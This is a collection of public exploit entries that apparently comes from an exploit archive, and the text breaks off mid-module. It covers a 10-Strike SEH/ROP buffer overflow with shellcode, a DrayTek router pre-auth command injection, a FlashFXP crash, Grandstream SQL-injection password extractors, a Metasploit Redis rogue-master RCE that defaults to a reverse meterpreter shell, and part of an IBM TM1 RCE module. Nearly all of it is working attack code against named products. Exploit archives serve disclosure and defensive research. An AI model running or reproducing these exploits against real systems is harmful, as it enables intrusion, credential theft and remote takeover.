# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) # Date: 2020-03-30 # Exploit Author: Hodorsec # Version: 9.03 # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Vendor Homepage: https://www.10-strike.com # Tested on: Win8.1 x64 - Build 9600 # Description: # - Exploits the functionality to load a list of computers from a file # - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP # - Used a jump after ROP to go to a buffer for more space # Reproduction: # - Run the script, a TXT file will be generated # - Open the program and click on tab "Computers" # - Click the button "From Text File" and select the generated TXT file # - Clck OK and check results # WinDBG initial crash output: # (f54.f48): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe # eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000 # eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203 # NetworkInventoryExplorer+0x2b47: # 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] # 0:000> g # (f54.f48): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388 # eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 # 41414141 ?? ??? #!/usr/bin/python import sys, struct filename = "poc_10_strike_nie.txt" # Maximum length maxlen = 5000 # Offsets crash_esi = 2145 # Initial space until ESI buffer filling crash_seh = 217 # SEH crash_nseh = crash_seh - 4 # NSEH landingpad = 310 # Space for RET NOP landingpad after stackpivoting # Shellcode # msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread # Payload size: 220 bytes shellcode = b"" shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06" shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14" shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02" shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb" shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e" shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b" shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0" shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5" shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50" shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94" shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87" shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce" shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12" shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf" shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1" shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9" shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8" shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82" shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68" shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f" # ROP chain def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x7c344efe, # POP EDX # RETN [MSVCR71.dll] 0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll] 0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe] 0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] 0x61e7555f, # POP EBP # RETN [sqlite3.dll] 0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll] 0x7c37678f, # POP EAX # RETN [MSVCR71.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x7c34d749, # NEG EAX # RETN [MSVCR71.dll] 0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe] 0xffffffff, # 0x61e0579d, # INC EBX # RETN [sqlite3.dll] 0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] 0x7c3458e6, # POP EDX # RETN [MSVCR71.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll] 0x7c369c4a, # POP ECX # RETN [MSVCR71.dll] 0x7c38dfd7, # &Writable location [MSVCR71.dll] 0x7c34a40e, # POP EDI # RETN [MSVCR71.dll] 0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe] 0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe] 0x90909090, # nop 0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() # NOPPING retnop = struct.pack("<L", 0x61e0103e) # RET # sqlite3.dll prenop = "\x90" * 200 # Pre NOP's after jumping back in stack, sledding until shellcode postnop = "\x90" * 16 # Post NOP's after running ROP chain to disable DEP # Jump back on stack for payload space jmpback = "\xe9\x9f\xf9\xff\xff" # jmp 0xfffff9a4 # Jump back on stack for more space # Prefix prefix = "A" * crash_nseh # Junk until NSEH nseh = "B" * 4 # Junk again, no use for NSEH seh = struct.pack("<L", 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot suffix = prenop # Prenopping until shellcode suffix += shellcode # Magic! suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled suffix += rop_chain # Disable DEP suffix += postnop # Old school NOP-sledding suffix += jmpback # Jump! Just like van Halen suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix)) # Junk for filling # Concatenate string for payload payload = prefix + nseh + seh + suffix # Put it all together try: file = open(filename,"wb") file.write(payload) file.close() print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully" except: print "[!] Error creating file!" sys.exit(0)

# CVE-2020-0796 Windows SMBv3 LPE Exploit  ## Authors * Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu)) * Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_)) ## References * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 * https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html * https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter * https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/ * http://blogs.360.cn/post/CVE-2020-0796.html * https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/ Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48267.zip

package main /* CVE-2020-8515: DrayTek pre-auth remote root RCE Mon Mar 30 2020 - 0xsha.io Affected: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta You should upgrade as soon as possible to 1.5.1 firmware or later This issue has been fixed in Vigor3900/2960/300B v1.5.1. read more : https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ https://thehackernews.com/2020/03/draytek-network-hacking.html https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ exploiting using keyPath POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: 1.2.3.4 Content-Length: 89 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a */ import ( "fmt" "io/ioutil" "net/http" "net/url" "os" "strings" ) func usage() { fmt.Println("CVE-2020-8515 exploit by @0xsha ") fmt.Println("Usage : " + os.Args[0] + " URL " + "command" ) fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" ) } func main() { if len(os.Args) < 3 { usage() os.Exit(-1) } targetUrl := os.Args[1] //cmd := "cat /etc/passwd" cmd := os.Args[2] // payload preparation vulnerableFile := "/cgi-bin/mainfunction.cgi" // specially crafted CMD // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a payload :=`' /bin/sh -c 'CMD' '` payload = strings.ReplaceAll(payload,"CMD", cmd) bypass := strings.ReplaceAll(payload," ", "${IFS}") //PostForm call url encoder internally resp, err := http.PostForm(targetUrl+vulnerableFile , url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} }) if err != nil{ fmt.Println("error connecting host") os.Exit(-1) } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil{ fmt.Println("error reading data") os.Exit(-1) } fmt.Println(string(body)) }

# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC) # Vendor Homepage: https://www.flashfxp.com/ # Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ # Exploit Author: Paras Bhatia # Discovery Date: 2020-03-30 # Vulnerable Software: FlashFXP # Version: 4.2.0 Build 1730 # Vulnerability Type: Denial of Service (DoS) Local # Tested on: Windows 10 Pro (64 bit) #Steps to Produce the Crash: # 1.- Run python code: FlashCrash.py # 2.- Copy content to clipboard # 3.- Open "FlashFXP.exe" # 4.- Go to "Options" > Filters > Skip List > New Entry # 5.- Paste ClipBoard into the "Mask" field # 6.- Click on OK # 7.- Go to "Options" > Filters > Skip List # 8.- Crashed ################################################################################################################################################# #Python "FlashCrash.py" Code: buffer = "\x41" * 300 f = open ("FlashCrash.txt", "w") f.write(buffer) f.close()

# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection # Date: 2020-03-30 # Exploit Author: Jacob Baines # Vendor Homepage: http://www.grandstream.com/ # Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware # Version: 1.0.20.20 and below # Tested on: Grandstream UCM6202 1.0.20.20 # CVE : CVE-2020-5726 # Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure # Advisory: https://www.tenable.com/security/research/tra-2020-17 # Sample output: # # albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1 --user lolwat # [+] Reaching out to 192.168.2.1:8888 # [+] Password length 9 # [+] The password is LabPass1% import sys import time import json import struct import socket import argparse def send_cti_with_length(sock, payload): to_send = struct.pack('>I', len(payload)) to_send = to_send + payload sock.sendall(to_send) return recv_cti_with_length(sock) def recv_cti_with_length(sock): length = sock.recv(4) length = struct.unpack('>I', length)[0] response = sock.recv(length) return response top_parser = argparse.ArgumentParser(description='') top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to") top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8888) top_parser.add_argument('--user', action="store", dest="user", required=True, help="The user to brute force") args = top_parser.parse_args() print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport)) length = 0 while length < 100: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((args.rhost, args.rport)) challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" + str(length).encode('utf-8') + b"--") inject_result = json.loads(challenge_resp) if (inject_result['status'] == 0): break else: length = length + 1 sock.close() if length == 100: print('[-] Failed to discover the password length') sys.exit(1) print('[+] Password length', length) password = '' while len(password) < length: value = 0x20 while value < 0x80: if value == 0x22 or value == 0x5c: temp_pass = password + '\\' temp_pass = temp_pass + chr(value) else: temp_pass = password + chr(value) temp_pass_len = len(temp_pass) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((args.rhost, args.rport)) challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" + temp_pass.encode('utf-8') + b"'--") inject_result = json.loads(challenge_resp) sock.close() if (inject_result['status'] == 0): password = temp_pass break else: value = value + 1 continue if value == 0x80: print('oh no.') sys.exit(0) print('[+] The password is', password)

# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection # Date: 2020-03-30 # Exploit Author: Jacob Baines # Vendor Homepage: http://www.grandstream.com/ # Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware # Version: 1.0.20.20 and below # Tested on: Grandstream UCM6202 1.0.20.20 # CVE : CVE-2020-5725 # Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based) # Advisory: https://www.tenable.com/security/research/tra-2020-17 # Sample output: # # albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat # [+] Password length is 9 # [+] Discovering password... # LabPass1% # [+] Done! The password is LabPass1% import sys import ssl import time import asyncio import argparse import websockets async def password_guess(ip, port, username): # the path to exploit uri = 'wss://' + ip + ':' + str(8089) + '/websockify' # no ssl verification ssl_context = ssl.SSLContext() ssl_context.verify_mode = ssl.CERT_NONE ssl_context.check_hostname = False # determine the length of the password. The timeout is 10 seconds... probably # way too long but whatever. length = 0 while length < 100: async with websockets.connect(uri, ssl=ssl_context) as websocket: start = time.time() login = '{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"' + username + '\' AND LENGTH(user_password)==' + str(length) + ' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or \'1\'=\'2","token":"lolwat"}}' await websocket.send(login) response = await websocket.recv() if (time.time() - start) < 5: length = length + 1 continue else: break # if we hit max password length than we've done something wrong if (length == 100): print('[+] Couldn\'t determine the passwords length.') sys.exit(1) print('[+] Password length is', length) print('[+] Discovering password...') # Now that we know the password length, just guess each password byte until # we've reached the full length. Again timeout set to 10 seconds. password = '' while len(password) < length: value = 0x20 while value < 0x80: if value == 0x22 or value == 0x5c: temp_pass = password + '\\' temp_pass = temp_pass + chr(value) else: temp_pass = password + chr(value) temp_pass_len = len(temp_pass) start = time.time() async with websockets.connect(uri, ssl=ssl_context) as websocket: challenge = '{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"' + username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or \'1\'=\'2","token":"lolwat"}}' await websocket.send(challenge) response = await websocket.recv() if (time.time() - start) < 5: value = value + 1 continue else: print('\r' + temp_pass, end='') password = temp_pass break if value == 0x80: print('') print('[-] Failed to determine the password.') sys.exit(1) print('') print('[+] Done! The password is', password) top_parser = argparse.ArgumentParser(description='') top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to") top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8089) top_parser.add_argument('--user', action="store", dest="user", required=True, help="The user to brute force") args = top_parser.parse_args() asyncio.get_event_loop().run_until_complete(password_guess(args.rhost, args.rport, args.user))

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TcpServer include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper include Msf::Auxiliary::Redis include Msf::Module::Deprecated moved_from "exploit/linux/redis/redis_unauth_exec" def initialize(info = {}) super(update_info(info, 'Name' => 'Redis Replication Code Execution', 'Description' => %q{ This module can be used to leverage the extension functionality added since Redis 4.0.0 to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis which called replication between master and slave. }, 'License' => MSF_LICENSE, 'Author' => [ 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module ], 'References' => [ [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'], [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK'] ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ ['Automatic', {} ], ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'SRVPORT' => '6379' }, 'Privileged' => false, 'DisclosureDate' => 'Nov 13 2018', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ SERVICE_RESOURCE_LOSS], 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] }, )) register_options( [ Opt::RPORT(6379), OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true]) ] ) register_advanced_options( [ OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']), OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']), OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.']) ] ) deregister_options('URIPATH', 'THREADS', 'SSLCert') end # # Now tested on redis 4.x and 5.x # def check connect # they are only vulnerable if we can run the CONFIG command, so try that return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/ if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data report_redis(redis_version) end unless redis_version print_error('Cannot retrieve redis version, please check it manually') return Exploit::CheckCode::Unknown end # Only vulnerable to version 4.x or 5.x version = Gem::Version.new(redis_version) if version >= Gem::Version.new('4.0.0') vprint_status("Redis version is #{redis_version}") return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe ensure disconnect end def has_check? true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis end def exploit if check_custom @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8) @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}" else @module_init_name = 'shell' @module_cmd = 'shell.exec' end if srvhost == '0.0.0.0' fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.') end # # Prepare for payload. # # 1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable. # It's only worked on linux system. # # 2. Use compiled payload, it's avaiable on all OS, however more detectable. # if check_custom buf = create_payload generate_code_file(buf) compile_payload end connect # # Send the payload. # redis_command('SLAVEOF', srvhost, srvport.to_s) redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}") ::IO.select(nil, nil, nil, 2.0) # start the rogue server start_rogue_server # waiting for victim to receive the payload. Rex.sleep(1) redis_command('MODULE', 'LOAD', "./#{module_file}") redis_command('SLAVEOF', 'NO', 'ONE') # Trigger it. print_status('Sending command to trigger payload.') pull_the_trigger # Clean up Rex.sleep(2) register_file_for_cleanup("./#{module_file}") #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb') #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}") ensure disconnect end # # We pretend to be a real redis server, and then slave the victim. # def start_rogue_server begin socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport}) print_status("Listening on #{srvhost}:#{srvport}") rescue Rex::BindFailed print_warning("Handler failed to bind to #{srvhost}:#{srvport}") print_status("Listening on 0.0.0.0:#{srvport}") socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport}) end rsock = socket.accept() vprint_status('Accepted a connection') # Start negotiation while true request = rsock.read(1024) vprint_status("in<<< #{request.inspect}") response = "" finish = false case when request.include?('PING') response = "+PONG\r\n" when request.include?('REPLCONF') response = "+OK\r\n" when request.include?('PSYNC') || request.include?('SYNC') response = "+FULLRESYNC #{'Z'*40} 1\r\n" response << "$#{payload_bin.length}\r\n" response << "#{payload_bin}\r\n" finish = true end if response.length < 200 vprint_status("out>>> #{response.inspect}") else vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}") end rsock.put(response) if finish print_status('Rogue server close...') rsock.close() socket.close() break end end end def pull_the_trigger if check_custom redis_command("#{@module_cmd}") else execute_cmdstager end end # # Parpare command stager for the pre-compiled payload. # And the command of module is hard-coded. # def execute_command(cmd, opts = {}) redis_command('shell.exec',"#{cmd.to_s}") rescue nil end # # Generate source code file of payload to be compiled dynamicly. # def generate_code_file(buf) template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb')) File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))} end def compile_payload make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile') vprint_status("Clean old files") vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|) vprint_status(%x|make -C #{File.dirname(make_file)} clean|) print_status('Compile redis module extension file') res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true| if res.include? 'true' print_good("Payload generated successfully! ") else print_error(res) fail_with(Failure::BadConfig, 'Check config of gcc compiler.') end end # # check the environment for compile payload to so file. # def check_env # check if linux return false unless %x|uname -s 2>/dev/null|.include? "Linux" # check if gcc installed return false unless %x|command -v gcc && echo true|.include? "true" # check if ld installed return false unless %x|command -v ld && echo true|.include? "true" true end def check_custom return @custom_payload if @custom_payload @custom_payload = false @custom_payload = true if check_env && datastore['CUSTOM'] @custom_payload end def module_file return @module_file if @module_file @module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so" end def create_payload p = payload.encoded Msf::Simple::Buffer.transform(p, 'c', 'buf') end def payload_bin return @payload_bin if @payload_bin if check_custom @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so')) else @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so')) end @payload_bin end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "IBM TM1 / Planning Analytics Unauthenticated Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows an unauthenticated attacker to perform a configuration overwrite. It starts by querying the Admin server for the available applications, picks one, and then exploits it. You can also provide an application name to bypass this step, and exploit the application directly. The configuration overwrite is used to change an application server authentication method to "CAM", a proprietary IBM auth method, which is simulated by the exploit. The exploit then performs a fake authentication as admin, and finally abuses TM1 scripting to perform a command injection as root or SYSTEM. Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux. Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014). }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <[email protected]>', # Vulnerability discovery and Metasploit module 'Gareth Batchelor <[email protected]>' # Real world exploit testing and feedback ], 'References' => [ [ 'CVE', '2019-4716' ], [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt' ], [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ] ], 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Windows (Command)', { 'Platform' => 'win', 'Arch' => [ARCH_CMD], 'Payload' => { # Plenty of bad chars in Windows... there might be more lurking 'BadChars' => "\x25\x26\x27\x3c\x3e\x7c", } } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Linux (Command)', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'Payload' => { # only one bad char in Linux, baby! (that we know of...) 'BadChars' => "\x27", } } ], [ 'AIX (Command)', { # This should work on AIX, but it was not tested! 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'Payload' => { # untested, but assumed to be similar to Linux 'BadChars' => "\x27", } } ], ], 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground 'DefaultOptions' => { # give the target lots of time to download the payload 'WfsDelay' => 30, }, 'Privileged' => true, 'DisclosureDate' => "Dec 19 2019", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5498), OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), ]) register_advanced_options [ OptString.new('APP_NAME', [false, 'Name of the target application']), OptInt.new('AUTH_ATTEMPTS', [true, "Number of attempts to auth to CAM server", 10]), ] end ## Packet structure start # these are client message types MSG_TYPES = { :auth => [ 0x0, 0x1 ], :auth_uniq => [ 0x0, 0x3 ], :auth_1001 => [ 0x0, 0x4 ], :auth_cam_pass => [ 0x0, 0x8 ], :auth_dist => [ 0x0, 0xa ], :obj_register => [ 0, 0x21 ], :obj_prop_set => [ 0, 0x25 ], :proc_create => [ 0x0, 0x9c ], :proc_exec => [ 0x0, 0xc4 ], :get_config => [ 0x1, 0x35 ], :upd_clt_pass => [ 0x1, 0xe2 ], :upd_central => [ 0x1, 0xae ], } # packet header is universal for both client and server PKT_HDR = [ 0, 0, 0xff, 0xff ] # pkt end marker (client only, server responses do not have it) PKT_END = [ 0xff, 0xff ] # empty auth object, used for operations that do not require auth AUTH_OBJ_EMPTY = [ 5, 3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ] # This is actually the client version number # 0x6949200 = 110400000 in decimal, or version 11.4 # The lowest that version 11.4 seems to accept is 8.4, so leave that as the default # 8.4 = 0x4CACE80 # 9.1 = 0x55ED120 # 9.4 = 0x5636500 # 10.1 = 0x5F767A0 # 10.4 = 0x5FBFB80 # 11.1 = 0x68FFE20 # 11.4 = 0x6949200 # # If something doesn't work, try using one of the values above, but bear in mind this module # was tested on 10.2.2 and 11.4, VERSION = [ 0x03, 0x04, 0xca, 0xce, 0x80 ] ## Packet structure end ## Network primitives start # unpack a string (hex string to array of bytes) def str_unpack(str) arr = [] str.scan(/../).each do |b| arr += [b].pack('H*').unpack('C*') end arr end # write strings directly to socket; each 2 string chars are a byte def sock_rw_str(sock, msg_str) sock_rw(sock, str_unpack(msg_str)) end # write array to socket and get result # wait should also be implemented in msf def sock_rw(sock, msg, ignore = false, wait = 0) sock.write(msg.pack('C*')) if not ignore sleep(wait) recv_sz = sock.read(2).unpack('H*')[0].to_i(16) bytes = sock.read(recv_sz-2).unpack('H*')[0] bytes end end def sock_r(sock) recv_sz = sock.read(2).unpack('H*')[0].to_i(16) bytes = sock.read(recv_sz-2).unpack('H*')[0] bytes end def get_socket(app_host, app_port, ssl = 0) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp( { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 } ) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError sock.close if sock end if sock.nil? fail_with(Failure::Unknown, 'Failed to connect to the chosen application') end if ssl == 1 # also need to add support for old ciphers ctx = OpenSSL::SSL::SSLContext.new ctx.min_version = OpenSSL::SSL::SSL3_VERSION ctx.security_level = 0 ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE s = OpenSSL::SSL::SSLSocket.new(sock, ctx) s.sync_close = true s.connect return s end return sock end ## Network primitives end ## Packet primitives start def pack_sz(sz) [sz].pack('n*').unpack('C*') end # build a packet, ready to send def pkt_build(msg_type, auth_obj, contents) pkt = PKT_HDR + msg_type + auth_obj + contents + PKT_END pack_sz(pkt.length + 2) + pkt end # extracts the first object from a server response def obj_extract(res) arr = str_unpack(res) # ignore packet header (4 bytes) arr.shift(PKT_HDR.length) if arr[0] == 5 # this is an object, get the type (1 byte) plus the object bytes (9 bytes) obj = Array.new obj = arr[0..9] obj end end # adds a string to a packet # C string = 0x2; utf string = 0xe; binary = 0xf def stradd(str, type = 0xe) arr = [ type ] # string type arr += pack_sz(str.length) arr += str.unpack('C*') arr end # packs binary data into an array def datapack(data) arr = [] data.chars.each do |d| arr << d.ord end arr end def binadd(data) arr = [ 0xf ] # binary type 0xf arr += pack_sz(data.length) # 2 byte size arr += datapack(data) # ... and add the data end def get_str(data) s = "" while data[0] != '"'.ord data.shift end data.shift while data[0] != '"'.ord s += data[0].chr data.shift end # comma data.shift s end # This fetches the current IntegratedSecurityMode from a packet such as # 0000ffff070000000203000000 01 07000000020e00000e0000 (1) # 0000ffff070000000203000000 02 07000000020e00000e00084b65726265726f73 (2) # 0000ffff070000000203000000 06 07000000010e0000 